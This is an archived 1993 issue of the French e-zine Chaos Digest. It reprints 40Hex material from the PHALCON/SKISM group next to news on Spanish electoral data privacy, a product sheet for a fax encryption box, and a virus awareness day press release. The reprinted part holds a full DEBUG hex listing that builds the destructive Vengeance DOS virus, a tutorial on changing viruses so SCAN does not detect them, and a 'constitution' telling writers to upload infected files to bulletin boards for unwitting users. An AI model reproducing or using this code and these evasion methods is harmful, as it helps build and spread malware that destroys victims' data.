Copy Link
Add to Bookmark
Report

Chaos Digest Volume 01 Numero 47

eZine's profile picture
Published in 
Chaos Digest
 · 4 years ago

  

Chaos Digest Mardi 8 Juin 1993 Volume 1 : Numero 47
ISSN 1244-4901

Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
Archiviste: Yves-Marie Crabbe
Co-Redacteurs: Arnaud Bigare, Stephane Briere

TABLE DES MATIERES, #1.47 (8 Juin 1993)
File 1--File 1--40H VMag Number 5 Volume 2 Issue 1 #005-007 (reprint)
File 2--Elections espagnoles et libertes des donnees (news)
File 3--SurFax, boitier de securisation des telecopies (produit)
File 4--_Computer Virus Awareness Day_ briefing's (communique)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
linux-activists-request@niksula.hut.fi
with a mail header or first line containing the following informations:
X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893. Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:

* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Number 5 Volume 2 Issue 1 #005-007 (reprint)


40Hex Number 5 Volume 2 Issue 1 File 005

___________________________________________
The Constitution of Worldwide Virus Writers
___________________________________________
Initial Release - February 12, 1992
___________________________________________

We, the members of PHALCON/SKISM, in order to form a more perfect
environment worldwide for the virus community, establish justice, ensure
intracommunity tranquility, provide for the common defense and offense,
promote the general welfare, and secure the blessings of liberty to
ourselves and our posterity, do ordain and establish this Constitution of
Worldwide Virus Writers.

ARTICLE I - REGARDING ORIGINAL VIRII
Section A - DEFINITION
The term "original virus" herein indicates programming done
exclusively by either one individual or group, with no code
taken from any other source, be it a book or another virus.
Section B - CODE REQUIREMENTS
For an original virus to conform to the standards set by
this document, it must include the following:
1) The title of the virus in square brackets followed by a
zero byte should be in the code, in a form suitable for
inclusion into SCAN(1). This is to ensure that the
name of the virus is known to those examining it.
2) The name of the author and his/her group affilition/s
should be included in the code, followed by a zero
byte. At the present, this is an optional requirement.
3) Some form of encryption or other form of stealth
techniques must be used. Even a simple XOR routine
will suffice.
4) If the virus infects files, the code should be able to
handle infection of read only files.
5) It must have some feature to distinguish it from other
virii. Creativity is encouraged above all else.
6) The virus must not be detectable by SCAN.
Section C - IMPLEMENTATION
This section, and all sections hereafter bearing the heading
"IMPLEMENTATION" refer to the recommended method of
implementation of the suggestions/requirements listed in the
current article.
1) Virus_Name db '[Avocado]',0
2) Author db 'Dark Angel, PHALCON/SKISM',0

ARTICLE II - REGARDING "HACKED" VIRII
Section A - DEFINITION
The term "hacked virus" herein refers to any virus written
by either one individual or a group which includes code
taken from any other source, be it a book, a code fragment,
or the entire source code from another virus.
The term "source virus" herein refers to the virus which
spawned the "hacked virus."
Section B - CODE REQUIREMENTS
For a "hacked" virus to conform to the standards set forth
by this document, it must include the following, in addition
to all the requirements set down in Article I of this
document:
1) The title, author (if available), and affiliation of
the author (if available) of the original virus.
2) The author of the hacked virus must give the source
code of said virus to the author of the source virus
upon demand.
3) No more Jerusalem, Burger, Vienna, Stoned, and Dark
Avenger hacks are to be written.
4) The source virus must be improved in some manner
(generally in efficiency of speed or size).
5) The hacked virus must significantly differ from the
source virus, i.e. it cannot be simply a text change.
Section C - IMPLEMENTATION
1) Credit db 'Source stolen from Avocado by Dark Angel of
PHALCON/SKISM',0

ARTICLE III - REGARDING VIRAL STRAINS
Section A - DEFINITION
The term "viral strain" herein refers to any virus written
by the original author which does not significantly differ
from the original. It generally implies a shrinking in code
size, although this is not required.
Section B - CODE REQUIREMENTS
For a "viral strain" to conform to the standards set by this
document, it must include the following, in addition to all
the requirements set down in Article I of this document:
1) The name of the virus shall be denoted by the name of
the original virus followed by a dash and the version
letter.
2) The name of the virus must not change from that of the
original strain.
3) A maximum of two strains of the virus can be written.
Section C - IMPLEMENTATION
1) Virus_Name db '[Avocado-B]',0

ARTICLE IV - DISTRIBUTION
Section A - DEFINITION
The term "distribution" herein refers to the transport of
the virus through an infected file to the medium of storage
of a third (unwitting) party.
Section B - INFECTION MEDIUM
The distributor shall infect a file with the virus before
uploading. Suggested files include:
1) Newly released utility programs.
2) "Hacked" versions of popular anti-viral software, i.e.
the version number should be changed, but little else.
3) Beta versions of any program.
The infected file, which must actually do something useful,
will then be uploaded to a board. The following boards are
fair game:
1) PD Boards
2) Lamer boards
3) Boards where the sysop is a dick
No virus shall ever be uploaded, especially by the author,
directly to an antivirus board, such as HomeBase or
Excalibur.
Section C - BINARY AND SOURCE CODE AVAILABILITY
The binary of the virus shall not be made available until at
least two weeks after the initial (illicit) distribution of
the virus. Further, the source code, which need not be made
available, cannot be released until the latest version of
SCAN detects the virus. The source code, should it be made
available, should be written in English.
Section D - DOCUMENTATION
Documentation can be included with the archive containing
the binary of the virus, although this is optional. The
author should include information about the virus suitable
for inclusion in the header of VSUM(2). A simple
description will follow, though the author need not reveal
any "hidden features" of the virus. Note this serves two
purposes:
1) Enable others to effectively spread the virus without
fear of self-infection.
2) Ensure that your virus gets a proper listing in VSUM.

ARTICLE V - AMENDMENTS
Section A - PROCEDURE
To propose an amendment, you must first contact a
PHALCON/SKISM member through one of our member boards.
Leave a message to one of us explaining the proposed change.
It will then be considered for inclusion. A new copy of the
Constitution will then be drafted and placed on member
boards under the filename "PS-CONST.TXT" available for free
download by all virus writers. Additionally, an updated
version of the constitution will be published periodically
in 40HEX.
Section B - AMENDMENTS
None as of this writing.

ARTICLE VI - MISCELLANEOUS
Section A - WHO YOU CAN MAKE FUN OF
This is a list of people who, over the past few years, have
proved themselves to be inept and open to ridicule.
1) Ross M. Greenberg, author of FluShot+
2) Patricia (What's VSUM?) Hoffman.
2) People who post "I am infected by Jerusalem, what do I
do?" or "I have 20 virii, let's trade!"
3) People who don't know the difference between a virus
and a trojan.
4) Lamers and "microwares puppies"
Section B - WHO YOU SHOULDN'T DIS TOO BADLY
This is a list of people who, over the past few years, have
proved themselves to be somewhat less inept and open to
ridicule than most.
1) John McAfee, nonauthor of SCAN
2) Dennis, true author of SCAN
Section C - MOTIVATION
In most cases, the motivation for writing a virus should not
be the pleasure of seeing someone else's system trashed, but
to test one's programming abilities.
__________
1 SCAN is a registered trademark of McAfee Associates.
2 VSUM is a registered trademark of that bitch who doesn't know her own
name.

+++++

40Hex Number 5 Volume 2 Issue 1 File 006
----------------------------------------------------------------------------
PHALCON/SKISM Vengeance virus. Released 02/03/92
Stats: Non-Resident .COM infector. in 40Hex Vmag
Infects files larger than 1992 bytes
Size of the virus is about 722 bytes


Note: This Virus is dedicated to the memory of Digital Warfare BBS, which was
online up until January 20th, 1992. On that fateful day, the BBS
computer was confiscated by local authorities. Hopefully the board will
come back up, and be as good as before...

This virus activates the 20th of every month. Just for the fun of it, I'm not
going to tell you what this thing does upon activation. I will say one thing
unless you have suicidal tendencies, DON'T test it on your own machine, OR
the machine of someone you love. It ain't pretty. It IS destructive. (286+)
It IS noisy. And it IS named appropriately.

Text that can be found in the virus:

*** Vengeance is ours! ***

PHALCON/SKISM '92

As of Scan 86, this virus isn't found. Since it is based on the Violator
virus, other scanners may find it. Oh well.

Have fun with this one, just don't run it on the 20th... at least, not on
YOUR machine!

%%%% DecimatoR /PHALCON/SKISM %%%%

---------------------------------------------------------------------------
n veng.com
e 0100 EB 0F 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0110 90 51 BA 27 03 FC 8B F2 83 C6 3D BF 00 01 B9 03
e 0120 00 F3 A4 8B F2 B8 0F FF CD 21 3D 01 01 75 03 E9
e 0130 E3 01 06 B4 2F CD 21 89 5C 33 90 8C 44 35 07 BA
e 0140 92 00 90 03 D6 B4 1A CD 21 90 06 56 8E 06 2C 00
e 0150 BF 00 00 5E 56 83 C6 43 AC B9 00 80 F2 AE B9 04
e 0160 00 AC AE 75 EE E2 FA 5E 07 89 7C 4E 8B FE 83 C7
e 0170 52 8B DE 83 C6 52 8B FE EB 3D 83 7C 4E 00 75 03
e 0180 E9 3F 01 1E 56 26 8E 1E 2C 00 90 8B FE 90 26 8B
e 0190 75 4E 90 83 C7 52 90 90 AC 90 3C 3B 90 74 0B 90
e 01A0 3C 00 74 03 AA EB F0 BE 00 00 5B 1F 89 77 4E 80
e 01B0 FD 5C 74 03 B0 5C AA 89 7F 50 8B F3 83 C6 48 B9
e 01C0 06 00 F3 A4 8B F3 B4 4E BA 52 00 03 D6 B9 03 00
e 01D0 CD 21 EB 04 B4 4F CD 21 73 02 EB 9E 8B 84 A8 00
e 01E0 24 1C 3C 1C 74 EE 81 BC AC 00 2D F7 77 E6 81 BC
e 01F0 AC 00 C8 07 72 DE 8B 7C 50 56 81 C6 B0 00 AC AA
e 0200 3C 00 75 FA 5E B8 00 43 BA 52 00 03 D6 CD 21 89
e 0210 4C 3B B8 01 43 83 E1 FE BA 52 00 03 D6 CD 21 B8
e 0220 02 3D BA 52 00 03 D6 CD 21 73 03 E9 87 00 8B D8
e 0230 B8 00 57 CD 21 89 4C 37 89 54 39 B4 2C CD 21 B4
e 0240 3F B9 03 00 BA 3D 00 03 D6 CD 21 72 53 3D 03 00
e 0250 75 4E B8 02 42 B9 00 00 BA 00 00 CD 21 72 41 8B
e 0260 C8 2D 03 00 89 44 41 81 C1 16 03 8B FE 81 EF 14
e 0270 02 89 0D B4 40 B9 D3 02 8B D6 81 EA 16 02 CD 21
e 0280 72 1E 3D D3 02 75 19 B8 00 42 B9 00 00 BA 00 00
e 0290 CD 21 72 0C B4 40 B9 03 00 8B D6 83 C2 40 CD 21
e 02A0 8B 54 39 8B 4C 37 83 E1 E0 83 C9 1C B8 01 57 CD
e 02B0 21 B4 3E CD 21 B8 01 43 8B 4C 3B BA 52 00 03 D6
e 02C0 CD 21 1E B4 1A 8B 54 33 8E 5C 35 CD 21 1F B4 2A
e 02D0 CD 21 80 FA 14 75 3E B4 09 8B D6 83 C2 00 CD 21
e 02E0 BA 80 00 32 ED B4 05 CD 13 80 FE 01 74 04 FE C6
e 02F0 EB F3 80 FD 20 74 06 32 F6 FE C5 EB E8 80 FA 81
e 0300 74 06 B2 81 32 F6 EB DB B8 09 25 CD 21 B4 02 B2
e 0310 07 CD 21 EB F8 59 33 C0 33 DB 33 D2 33 F6 BF 00
e 0320 01 57 33 FF C2 FF FF 0D 0A 2A 2A 2A 20 56 65 6E
e 0330 67 65 61 6E 63 65 20 69 73 20 6F 75 72 73 21 20
e 0340 2A 2A 2A 0D 0A 24 20 53 4B 49 53 4D 2F 50 68 61
e 0350 6C 63 6F 6E 20 27 39 32 20 24 00 00 00 00 00 00
e 0360 00 00 00 00 CD 20 90 E9 00 00 50 41 54 48 3D 2A
e 0370 2E 43 4F 4D 00 00 00 00 00 00 00 00 00 00 00 00
e 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03E0 00 00 00 00
rcx
03E3
w
q

+++++

40Hex Number 5 Volume 2 Issue 1 File 007

HOW TO MODIFY A VIRUS SO SCAN WON'T CATCH IT
PART II


In Issue 1 of 40Hex, Hellraiser presented a simple (though incredibly
tedious) method of searching for scan strings. In short, this was his
method:

1) Make a small carrier file.
2) Infect the carrier with the virus.
3) Fill parts of the virus with a dummy value until you isolate the
scan string.
4) Modify the virus so it is not detectable, i.e. switch the order of
the instructions.

The problem is, of course, that step 3 takes a maddeningly inordinate
amount of time. I shall present a tip which will save you much time.
The trick is, of course, to find out where the encryption mechanism and
hence the unencrypted portion where the scan string is usually located.
Once the encryption mechanism is located, isolating the scan string is
much simpler.

Of course, the problem is finding the encryption mechanism in the first
place. The simplest method of doing this is using V Communication's
Sourcer 486, or any similar dissassembler. Dissassemble the file and
search for the unencrypted portions. Most of the file will be DBs, so
search for any part which isn't. Once you have located those parts, all
you have to do is subtract 100h from the memory location to find its
physical offset in the file. You now have a general idea of where the
scan string is located, so perform step 3 until you find it.

Ack, you say, what if you don't have Sourcer? Well, all is not lost.
Load up the infected carrier in good old DEBUG. The first instruction
(in COM infections) should be a JMP. Trace (T) into the JMP and you
should be thrown into the area around the encryption mechanism. Use the
memory offset (relative to the PSP segment) and subtract 100h to find
the physical location of the unencrypted portion in the file. Once
again, once you have this, perform step 3. Simple, no?

Sometimes, SCAN looks for the writing portion of the code, which
generally calls INT 21h, function 40h. This is usually, though not
always, located somewhere near the encryption mechanism. If it is
not near there, all you have to do is trace through the virus until
it calls the write file function.

Another method of looking for scan codes is to break the infected carrier
file into a series of 50 byte overlapping chunks. For example, the first
chunk would be from offset 0 to 49, the second from 24 to 74, the third
from 49 to 99, etc. Then use SCAN to see which chunk holds the scan code.
This is by far the easiest, not to mention quickest, method.

One side note on step 1, making the carrier file. Some virii don't
infect tiny files. What you must do is create a larger file (duh).
Simply assemble the following two lines:

int 20h
db 98 dup (0)

(with all the garbage segment declarations and shit, of course) and
you'll have a nice 100 byte carrier which should be sufficient in most
cases, with maybe the exception of the Darth Vaders.

Enjoy!
Dark Angel

------------------------------

Date: Mon Jun 7 22:05:44 -0100 1993
From: rfcalvo@guest2.atimdr.es (Rafael Fernandez Calvo )
Subject: File 2--Elections espagnoles et libertes des donnees (news)


CCCCC LL II
CC LL II
CC LL II -- N E W S FROM S P A I N --- June 7, 1993
CCCCC LLLLLL II

COMMISSION for LIBERTIES
and INFORMATICS (*)

PRIVACY AND GENERAL ELECTIONS: TRICKS OF THE TRADE
++++++++++++++++++++++++++++++++++++++++++++++++++

Spain held general parlamentary elections yesterday, June 6th.
Regardless of the ocutcome (the ruling Socialist Party obtained again
a majority of the seats), one of the parties participating in the
event, "Centrist Unity-Spanish Democratic Party", was expelled of the
race on June 1 by the Electoral Control Committee on the grounds that
the party was actually a sham put up by a group of direct marketing
pirates. It is not the first time it happens but it is the first time
corrective actions are taken again such violations.

Regardless of the fact that this party had no choice whatsoever
of winning a single seat, it showed again one of the problems
that has been plaguing citizens' privacy in Spain since 1977 (first
democratic elections after forty years of dictatorship): the use for
commercial purposes of the magnetic tapes containing the Election
Census, provided to the parties by the Public Administration.

Big parties do not seem to have participated in data smuggling
practices but there is evidence that many of the companies that process
the tapes provided by them are the main source of abuse against the
privacy of citizens in regard to their personal data in Spain, since they
duplicate and sell the tapes. This fact has been frequently dennounced by
CLI (*).

The recently approved Personal Data Law could help to stop these
practices.

* SOME WORDS ABOUT CLI

The --Commission for Liberties and Informatics, CLI-- is an independent
and pluralistic organization that was officially constituted in April'91.

Its mission is to "promote the development and protection of citizens'
rights, specially privacy, against misuse of Information Technologies".

As of May '93, CLI is composed by nine organizations, with a joint
membership of about 3,000,000 people. They cover a very wide spectrum of
social interest groups: associations of computer professionals, judges,
civil rights leagues, trade unions, consumers groups, direct marketing
industry, etc.

CLI is confederated with similar bodies created in some other Spanish
Regions such as Valencia, Basque Country and Catalonia, and has fluid
working relationships with many public and private Data Protection bodies
and entities all over the world, including CNIL, CPSR and Privacy
International.

CLI has its headquarters in:

Padilla 66, 3 dcha.
E-28006 Madrid, Spain

Phone: (34-1) 402 9391
Fax: (34-1) 309 3685
E-mail: rfcalvo@guest2.atimdr.es

------------------------------

Date: Tue Jun 8 06:06:17 EDT 1993
From: celma_s@epita.fr (Samuel Celma )
Subject: File 3--SurFax, boitier de securisation des telecopies (produit)


SURFAX

High Security Encryption System for Facsimile Communication


* Connected between any GIII facsimile equipment and the telephone line;
* Use a high performance crypto algorithm (2'(59) = 10'(18) possible
cipher keys);
* Designed for finance, commercial and industrial operations;
* very easy and friendly handling.

SurFax, used on both side of the PSTN with group 3 fax, provides security
for all the transmitted documents.

Installation
+------------

+-----+ +--------+ +--------1 +--------+ +-----+
| Fax |====| Surfax |=====> | PSTN | <=====| Surfax |====| Fax |
+-----+ +--------+ +--------+ +--------+ +-----+

Simply plugin and add-on
No modification required to the fax equipment


Operation
+---------

10-key keyboard
16 digits LCD display
Secret key handling with keyboard
Plain mode / encryption mode selectable with keyboard and hardkey
Dimensions: 16 x 20 x 12 cm
Weight: approx. 1.3 kg
Power: 110/200 VAC, 50/60 Hz


Facsimile Technical Specifications
+----------------------------------

Two facsimile modems
Transmission speed: 9600/7200/4800/2400 bit/s
(CCITT V29, V27ter, V21)
Designed to work with Group III facsimile equipments
Fully compatible for transmission to non-crypto fax equipment (T30 protocol)


Security Features
+-----------------

SurFax is a secret key system type.

(1) KEY MANAGEMENT

The system has an integrated key management. The user has to enter his 8
figures secret key on keyboard. A physical key allows the user to let
Surfax in the chosen mode (plain or cipher).

Otherwise, secret key can be erased at any time at the touch of a button,
and is automatically erased after each communication. A 32-bit session key is
generated by a "built-in" random number generator.

Both secret and session keys are combined into a cypher key (2'(59)
possible values) on each terminal. Both secret and session keys are never
transferred in clear between the two terminals. A new cypher key is created
for each transmitted page. Closed user groups can be created by request to
the manufacturer (by setting a customer specific parameter).

(2) CIPHER TECHNOLOGY

The K.E.A. (KTT Encryption Algorithm) is KTT proprietary. It is a realtime
data ciphering process and is used to encrypt only the facsimile data.

It is based on a random generator, which initial state relies on a cipher
key, issued from a secret key and a session key (2'(59)).


More informations
+-----------------

Mr David COHEN
SKTT Henry Kam Technologies & Telecommunations
2d rue de l'Epine Prolongee
93541 Bagnolet Cedex
Phone: +33 1 42 87 54 00
Fax: +33 1 42 87 23 91

------------------------------

Date: Tue Jun 8 06:06:17 EDT 1993
From: ae446@freenet.carleton.ca (Nigel Allen )
Subject: File 4--_Computer Virus Awareness Day_ briefing's (communique)


Press Release
from the National Computer Security Association.

Rep. Fields to sponsor Computer Virus Awareness Day briefing;
Rep. Markey to speak to NCSA
To: Assignment Desk, Daybook Editor
Contact: Larry Teien of 3M Data Storage Products, St. Paul, Minn.,
612-736-5961, or
Bob Bales of the National Computer Security Association,
Carlisle, Pa., 717-258-1816, or
Ken Greenberg of Fleishman-Hillard Inc., Los Angeles,
213-629-4974

News Advisory:

WHAT: National Computer Virus Awareness Day

Congressional briefing on the virus threat and recommended
remedial action, sponsored by Rep. Jack Fields (R-Texas),
ranking Republican on the House Subcommittee on
Telecommunications and Finance; and an informational
exhibit about computer virus control and information
security.

WHERE: Rayburn House Office Building, Washington, D.C.,
Room 2257

WHEN: Wednesday, June 9

8:30 a.m. to 9:30 a.m. -- Panelist presentations
9:30 a.m. to 10:30 a.m. -- Media Q&A

WHO: Co-sponsored by 3M Co. and the National Computer Security
Association (NCSA). Endorsed by the American Electronics
Association, the Electronic Industries Association and the
Microcomputer Managers Association.

Panel members to include representatives of NYNEX,
Rockwell International and the Departments of Justice
and Defense, as well as 3M and NCSA.

ALSO: 3M/NCSA Congressional dinner, featuring Rep. Edward J.
Markey (D-Mass.), chairman of the House Subcommittee
on Telecommunications and Finance.

Cotillion Room, Sheraton Washington Hotel
2660 Woodley Road N.W.; 7:45 p.m. on June 10
--
Nigel Allen, Toronto, Ontario, Canada ae446@freenet.carleton.ca

------------------------------

End of Chaos Digest #1.47
************************************

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT